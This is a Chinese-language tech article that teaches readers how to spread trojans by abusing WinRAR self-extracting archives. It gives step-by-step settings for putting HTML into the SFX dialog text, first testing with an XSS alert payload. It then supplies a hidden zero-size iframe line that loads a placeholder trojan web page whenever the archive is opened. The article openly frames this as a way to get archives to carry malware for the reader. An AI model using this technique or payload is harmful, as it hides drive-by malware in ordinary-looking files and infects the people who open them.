| 来源:中关村在线 作者:张齐
压缩文件是最见的文件类型之一,无论是正常的软件程序,或者是“精心”制作的压缩包木马,都随处可见。对于这类最常见的文件,我们当然会想方设法,让它为我们传播木马服务。不过,普通的压缩包中夹带木马的方法已经有些落伍了,今天我们将重点分析一种WinRAR压缩包传播木马的新思路!
一、WinRAR与木马结合的优点
大家都知道WinRAR软件可以制作EXE自解压文件,以方便没有安装WinRAR软件的用户。WinRAR制作的自解压文件非常常见,而且不少软件也开始采用它来制作安装程序。用WinRAR制作自解压文件时,还可以对自解压界面进行自定义美化,在自解压时显示任意的文件或图片。我们可以通过对WinRAR自解压文件界面的再定义,从而欺骗对方在解压前执行网页木马。
二、简单测试
首先,我们需要制作一个WinRAR自解压文件。可以将任意资源,比如几张图片或音乐之类的打包压缩成RAR格式。然后用WinRAR打开压缩包,点击WinRAR工具栏上的“自解压”按钮,打开自解压文件制作对话框。在“自解压模块”中选择“Deault.sfx”模块,点击“高级自解压选项”按钮,打开高级自解压选项设置对话框。选择“文本和图标”选项卡,在下面的“自解压文件窗口中显示的文本”区里,可以输人任意文字,都将显示在自解压界面中。如果我们输入网页代码,是否会执行呢?
这里我们先来测试一下,在文本输入区中,输入如下代码:
<script>alert('nethack')</script>
这段代码常常被用来检测跨站漏洞,如果存在漏洞的话,那么在网页中会弹出一个文字提示对话框。点击“确定”按钮,返回自解压对话框,再点击“确定”按钮,即可在压缩包文件路径下,生成一个同名的后缀为.exe的自解压文件。现在,我们来双击这个自解压文件,看看前面的跨站检测代码是否执行?自解压文件打开后,同时弹出了刚才设置的文字提示对话框,说明网页代码执行了。
由此可见,WinRAR的自解压文件界面存在着跨站挂马的 漏洞,我们完全可以修改刚才的测试代码,让自解压文件在打开时显示任意的网页,当然也可以显示木马网页,从而实现利用WinRAR自解压文件挂网页 木马的 攻击目的! 现在,我们来制作一个具有挂马攻击性的WinRAR自解压文件。首先,准备一个网页木马,并将其上传到某个网站空间中去。这里假设网页木马链接地址为“http://www.XXX.com/01.htm”。然后制作一个自解压文件,方法与前面相同,但是在写入文本框中,我们需要输入如下代码:
<iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>
这段代码表示显示一个长宽都为0网页象素,也就是不可见的页面框架,显示的网页内容为指定的木马网页。确定后即可制作成功一个挂马攻击的WinRAR自解压文件了。但是这里为了便于抓图显示攻击效果,我们将挂马语句改为了:
<iframe width=800 height=800 src="http://www.baidu.com"></iframe>
|
